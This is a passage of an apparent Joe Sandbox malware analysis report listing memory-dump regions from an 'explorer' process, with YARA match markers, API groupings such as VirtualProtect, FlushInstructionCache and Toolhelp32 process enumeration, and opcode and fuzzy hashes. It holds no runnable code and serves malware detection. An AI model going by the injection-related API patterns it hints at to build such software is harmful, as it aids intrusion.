                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction ID: dc7efb154c4a7ba49e78f3b229e7f99632b64b2ae203dda74f9d96c9602649dc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C018F71B1969181DA549B17FA5436AA2D0AB8CFC0F085434DE4E53B59EF3CC8C18B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction ID: 3fd71057719a87543b7561b0b8ea103b954a089b13be65f4c5c41be9292b0b76
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86016D2271979282EE649B16B94433AA6E1EF4DFD0F885034DE4E47F19EF2CD4868B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
• Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEDDD5E
                                                                                                                                                                                                                          • Part of subcall function 0DEDF615: std::_Lockit::_Lockit.LIBCPMT ref: 0DEDF62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEDDDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEDDDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEDDE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEDDE2E
                                                                                                                                                                                                                          • Part of subcall function 0DEDF615: std::_Lockit::_Lockit.LIBCPMT ref: 0DEDF62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEDDE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEDDEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEDDED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0822DD5E
                                                                                                                                                                                                                          • Part of subcall function 0822F615: std::_Lockit::_Lockit.LIBCPMT ref: 0822F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0822DDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0822DDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0822DE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0822DE2E
                                                                                                                                                                                                                          • Part of subcall function 0822F615: std::_Lockit::_Lockit.LIBCPMT ref: 0822F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0822DE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0822DEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0822DED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E08DE2E
                                                                                                                                                                                                                          • Part of subcall function 0E08F615: std::_Lockit::_Lockit.LIBCPMT ref: 0E08F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E08DE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E08DEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E08DED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction ID: c172f909fcf3ca2c6ce592f496ebf132735b34ce44060245964ac86ecf16bee4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16115131618E4C4F9B85FF28D4D46AAB7E1FBA8310F504B2E908AC32A8DE74DD05D781
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E08DD5E
                                                                                                                                                                                                                          • Part of subcall function 0E08F615: std::_Lockit::_Lockit.LIBCPMT ref: 0E08F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E08DDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E08DDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E08DE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction ID: 9ed0ebbf84b098b3398f8b2cc910e2f0969109894b8d64bcc002f31d8601c21a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76117F31618F4C4F9B85FF28D4E46AAB7E1FBA8250F504A2A908AC3368DF34DD45D781
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: 586a589cba21b0d55c261b3c246d2bcd9d377ad471d45d0b69a5f81490d8c168
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8931BF722086C08AD7198F36E50036D7BA0F749F88F494216EF994B79ACB7CD991C754
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: 5f08ff4f2db674ff3bb35e622b477f825802a7dc242619f953fbf5005f65b3a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1131AEA36186C186D7218F35A50037DBF60FB05FC8F484226EF998BB9ACB6CE451C754
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0DEF0BEE
                                                                                                                                                                                                                          • Part of subcall function 0DEF7C45: _FindPESection.LIBCMT ref: 0DEF7C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 0DEF0BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 0DEF0C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0DEF0C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: fe2de54080c22e50a77de8cc18995bbcf9705b168fdacca339d2aeb55084e3f7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B711E931214A098FE729FB34EC943F63392FB44345F41A5359603D20A5EF78D685C681
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08240BEE
                                                                                                                                                                                                                          • Part of subcall function 08247C45: _FindPESection.LIBCMT ref: 08247C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 08240BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 08240C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08240C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: cdf6fe5564754398c7ecf241412835b904b1def306c9648f4cf99a929e9cf3da
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0118635130E0BCFE76DEB34EC946A63394FB44242F4455399907C3164EF7895C6CAA5
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0E0A0BEE
                                                                                                                                                                                                                          • Part of subcall function 0E0A7C45: _FindPESection.LIBCMT ref: 0E0A7C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 0E0A0BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 0E0A0C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0E0A0C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: b859286b9f6baf110a25ac12a4327cf5da43d520a915e7638260cd768fa7127f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16118631110A0E8FE769EBB4ECA86E633D1FB54380F4889399507C3064EF789D45CB81
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 44ae286bc0b77f0989d151692f6e6c4de424ec39e46e9d34320c43e19ea8a8c5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1211516231868591DA20EB2DE8503FAB361F7C97A4F859225DB9D47A98DF28CA05CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 09f27b67f5ad4552904337e1afac4699bb311dbcbe40dbba914c4ee1c883113f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F711933231868481DE20EB21E8543AEB3B1F7C8794FC45A21DA9D47A98DF7CCA85CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 3ee03e3ab18bdec518feb08eaa2cb2b4e4cc2bbdb7c726f237011a938917b6b4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611512221878591DB20EB25E8503AAB361FBC9B98FC44225DB9D47699EF2CD605CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: 70ae09647e5d53509edf61e957aad26a37b04e81d483e8cdbee1e078438a1632
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32017CA172459282EB808B6BF54072A6361E784FC8F499027DF1D87B58DF69C9908B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: dd19bcb5865610bb279f6c5c04cb88147d8ab615d3f558fd843f6ac7fbf59c3f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0014F7172459182EB90CB27F58075E63A0E788FC4F495416DF2D57B8CDF79CA918B04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: d34c4e72bfa765051a57ee13e0ef8d3660f9dbc2e50cfc6e7c018a066782815c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E017C6172468282EB90CB27F54072EA760EB84FC4F485026DF189BB49DF2DD5958B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
